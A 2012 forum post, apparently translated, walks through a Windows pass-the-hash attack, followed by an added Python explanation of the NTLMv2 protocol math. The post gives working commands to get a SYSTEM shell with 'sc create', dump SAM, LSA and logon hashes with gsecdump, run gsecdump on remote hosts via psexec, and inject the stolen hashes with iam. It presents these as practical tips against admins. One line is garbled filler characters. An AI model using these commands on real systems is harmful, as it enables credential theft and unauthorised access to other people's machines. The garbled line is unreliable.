HASH injection attack

Posted 2012-11-6 21:09:29
To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

! w  B: ~/ U$ Q" n  `: GThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
, P6 t% T- C+ C1 N- Q" ~' }6 R$ w+ `# q3 c
A tip: you can use iam from the pshtools toolkit to import the HASH information just captured with gsecdump into the local lsass process, to carry out a hash-injection attack. The foreigners are really good at this; admins will have their hands full now. With the LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, there is actually no need to crack the password at all; it is just a matter of using the tool. As the original article puts it well, no matter whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
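Added example, not part of the original post or of the quoted truesec blog: the reason a dumped hash is "100% done" without cracking is that NTLM never transmits the password. The client proves knowledge of the NT hash (MD4 over the UTF-16LE password), so anyone holding the hash can produce a valid NTLMv2 response. The block below computes the response twice, once from a password and once from only the hash line that a tool like gsecdump -u would give an attacker, and shows they are identical. MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable (OpenSSL legacy provider). The user, domain, server challenge and client blob are constructed values for the example; nothing here injects into lsass (that is what iam.exe does), this only shows the protocol math behind it.

```python
"""
Pass-the-hash, explained at the protocol level (added example).

NTLMv2 (MS-NLMP) needs only the NT hash, never the cleartext password.
The same response is derived from "password" and from its dumped hash.
"""
import hmac
import hashlib
import struct

_MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (used only because hashlib md4 is often disabled)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK32

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    # Padding: 0x80, zeros up to 56 mod 64, then the 64-bit little-endian bit length.
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # (function, round constant, shift cycle, message-word order) for the three rounds.
    rounds = (
        (f, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (g, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + X[k] + const) & _MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step works on d
        A, B, C, D = (A + a) & _MASK32, (B + b) & _MASK32, (C + c) & _MASK32, (D + d) & _MASK32
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NT hash: unsalted MD4 over the UTF-16LE password. Length of the password is irrelevant."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(nt: bytes, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTLMv2 response per MS-NLMP; the only secret input is the NT hash."""
    # NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
    key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    # NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob); response = NTProofStr || blob
    proof = hmac.new(key, server_challenge + client_blob, hashlib.md5).digest()
    return proof + client_blob


def pass_the_hash_demo() -> bool:
    """Derive the response from the password and from the dumped hash; they must match."""
    # Constructed example values (not captured from any real host).
    user, domain = "alice", "CORP"
    server_challenge = bytes.fromhex("0123456789abcdef")
    # Simplified NTLMv2 client blob ("temp"): version bytes, zeros, a client nonce, padding.
    client_blob = bytes.fromhex("0101000000000000" + "00" * 8 + "deadbeefcafef00d" + "00000000")

    from_password = ntlmv2_response(nt_hash("password"), user, domain,
                                    server_challenge, client_blob)
    # The NT half of a dumped LM:NT line; 8846f7ea... is the well-known NT hash of "password".
    dumped_nt = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
    from_hash = ntlmv2_response(dumped_nt, user, domain, server_challenge, client_blob)
    return from_password == from_hash


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("response from password == response from hash:", pass_the_hash_demo())
```

The dumped line from gsecdump -u carries LM:NT pairs; only the NT half is used above because NTLMv2 does not involve the LM hash at all, which is also why "cracking the LM hash with rainbow tables" is an optional extra rather than a prerequisite for authenticating as that user.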